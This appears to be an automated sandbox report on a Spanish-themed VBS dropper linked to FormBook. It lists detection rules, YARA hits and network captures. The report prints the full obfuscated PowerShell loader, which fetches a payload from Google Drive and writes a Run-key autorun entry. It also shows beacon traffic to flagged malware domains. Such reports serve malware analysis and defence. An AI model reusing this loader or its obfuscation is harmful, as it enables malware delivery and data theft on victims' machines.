        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wab.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\replace.exe, ProcessId: 2988, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YDN4C
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs", ProcessId: 7408, ProcessName: wscript.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. VorttHalvfx FejetAutos Strue-UdsagVkunsta CpmmlUdmatuSadl.e flin Hjemm$,aderFThromoLiv or e aafHulnirStanddsennaiArkitgImmigeGlosetRubbe;He er ');Surere (Herremaend 'AlkyliMuddlfAlb i udpi(antiotAvissePleursKbsvatMiddl-Kronip Tanda VipetDu,tthzygne GrandTLiche:Lusk.\GruppTA skieSpindsKantetBajaduPirridHvedeo Gobl.Stra,tSamarxReg st Ultr)Globa{Poly e eostxHillbi SkubtRaadf} Sual;trise ');$Tidsskriftsudvlgelserne = Herremaend 'Shille,lericRisikhKaldeo Tjen L nje%Ki,keaBr.dop LendpBirthdNo.spaRevalt Tiraasnebo% Do,e\AasteMnyst.eFrankd TsaririskikAnnalaWilmam,rfteeLamb nBe,hptR.ttoeSvveflCri,i.VanddDPro,odTopsagDdska Lserf&halss&Udl,s Telefe ,ilccRkv,khpooftoBugse Malth$S are ';Surere (Herremaend 'Gombe$TilbagSpa.kl Sgepo F,rfbPseu,aSkrd.l P.og:Bi,psFFo tirSl wdi KolitFremtuBrinjr DecieMalminTredi=S,pra(Firsic BystmP umpd unde Te,ot/Pallhc Rapg Conta$.retcT,elamiExu.ad .ibesS.othsUnto kPrejursulteiDelphfTarlet UtilsDiscruBo uldKinesvTilkrl Mes,g Dv,geergonlVrc.ssProtoeSomikrHanden DraweBoxfi)Outte ');Surere (Herremaend 'Anstt$ pibogT,lstl Ch,roParrobEutecaOrkidlKan i:UnsocTDrmmeinucl.r,eproe Guars StrioBloublUkor =Ubesr$,anskHFionnaModstlTur el

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: http://www.dhleba51.ru/im2z/Avira URL Cloud: Label: malware
        Yara detected FormBook
        Source: Yara matchFile source: 00000012.00000002.2595491228.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595044684.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2595118145.00000000029E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2593836346.00000000024F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249433724.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.101.100:443 -> 192.168.2.9:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.9:49713 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007489000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921609089.0000000007390000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdb source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.1913857979.0000000000CC2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: replace.pdbGCTL source: wab.exe, 0000000C.00000003.2218166538.0000000008A61000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: stem.Core.pdbS] source: powershell.exe, 00000005.00000002.1924285090.000000000826A000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: Joe Sandbox ViewIP Address: 195.24.68.5 195.24.68.5
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY HTTP/1.1Host: www.webwheelsmedia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
        Source: unknownDNS traffic detected: queries for: drive.google.com
        Source: unknownHTTP traffic detected: POST /im2z/ HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enOrigin: http://www.dhleba51.ruConnection: closeContent-Length: 193Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.dhleba51.ru/im2z/User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0Data Raw: 5f 4e 79 34 3d 7a 78 76 31 75 73 58 67 67 48 79 48 36 59 46 47 70 41 66 38 63 70 32 37 57 75 57 78 4f 4d 74 54 4b 38 76 2b 6d 6a 6c 33 64 79 36 63 6c 38 69 67 68 48 77 38 45 2b 48 2b 4e 64 4f 34 69 45 6c 57 42 77 6f 76 69 72 74 58 4c 49 47 61 56 70 4e 59 53 4d 78 65 67 6e 53 72 4b 69 5a 59 55 75 54 58 72 6e 62 46 36 67 70 76 4a 47 4c 51 43 2f 32 65 7a 59 42 44 64 66 4c 64 2f 4a 58 34 38 6d 63 63 75 41 31 6b 66 65 4a 42 59 4b 79 54 6f 6e 4d 6c 43 41 6c 77 4c 58 48 77 4a 50 4f 4d 71 33 6c 79 52 75 2b 50 46 33 67 70 42 39 52 5a 54 38 52 74 4a 6f 77 4b 64 4b 6c 78 65 56 4f 65 Data Ascii: _Ny4=zxv1usXggHyH6YFGpAf8cp27WuWxOMtTK8v+mjl3dy6cl8ighHw8E+H+NdO4iElWBwovirtXLIGaVpNYSMxegnSrKiZYUuTXrnbF6gpvJGLQC/2ezYBDdfLd/JX48mccuA1kfeJBYKyTonMlCAlwLXHwJPOMq3lyRu+PF3gpB9RZT8RtJowKdKlxeVOe
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 24 Apr 2024 05:05:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 48773Connection: closeAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 2
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
        Source: powershell.exe, 00000002.00000002.2333966169.000002B347A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: MSHXUddoGk.exe, 00000012.00000002.2596058187.0000000002C04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000005.00000002.1915385370.0000000004B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339C19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000C.00000003.1893294150.0000000008A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000005.00000002.1919062447.0000000005BA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2177170811.000002B339BEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
        Source: powershell.exe, 00000002.00000002.2177170811.000002B337E10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2177170811.000002B339B94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: wab.exe, 0000000C.00000002.2285301301.0000000023B70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI
        Source: powershell.exe, 00000002.00000002.2353946109.000002B34FF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB32
